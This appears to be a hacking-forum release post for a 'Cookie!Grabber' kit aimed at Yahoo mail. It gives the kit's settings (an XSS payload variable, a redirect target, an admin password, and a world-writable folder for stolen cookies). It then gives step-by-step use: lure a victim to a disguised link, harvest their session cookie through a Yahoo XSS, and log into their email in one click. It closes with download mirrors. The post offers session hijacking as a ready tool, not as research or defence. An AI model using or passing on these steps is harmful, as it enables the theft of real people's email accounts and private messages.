Author: HrN @ InSecurity.Ro settings: HTML: index.php -> $xss //Yahoo XSS index.php -> $redirect_to //Where you want to redirect the victim, when access your URL. admin.php -> $pass (default: isr) chmod 777 ./prajituri/ //Here will be saved all cookies. How to use: Find a XSS in subdomain.Yahoo.com, configure for Cookie grabber, sent to victim on mail.yahoo.com to access your URL with Cookie!Grabber (http://something.fake.com/img/index.php). After he access this link, will be appear in adminpanel, and you'll can logIn on his email account with only 1 click (for yahoo!messenger list you can use webmessenger.yahoo.com) Downloads Mirrors: Code: http://www.netdrive.ws/197376.html http://insecurity.ro/board/attachment.php?attachmentid=20&d=1261988999 Thanks, TinKode @ ISR
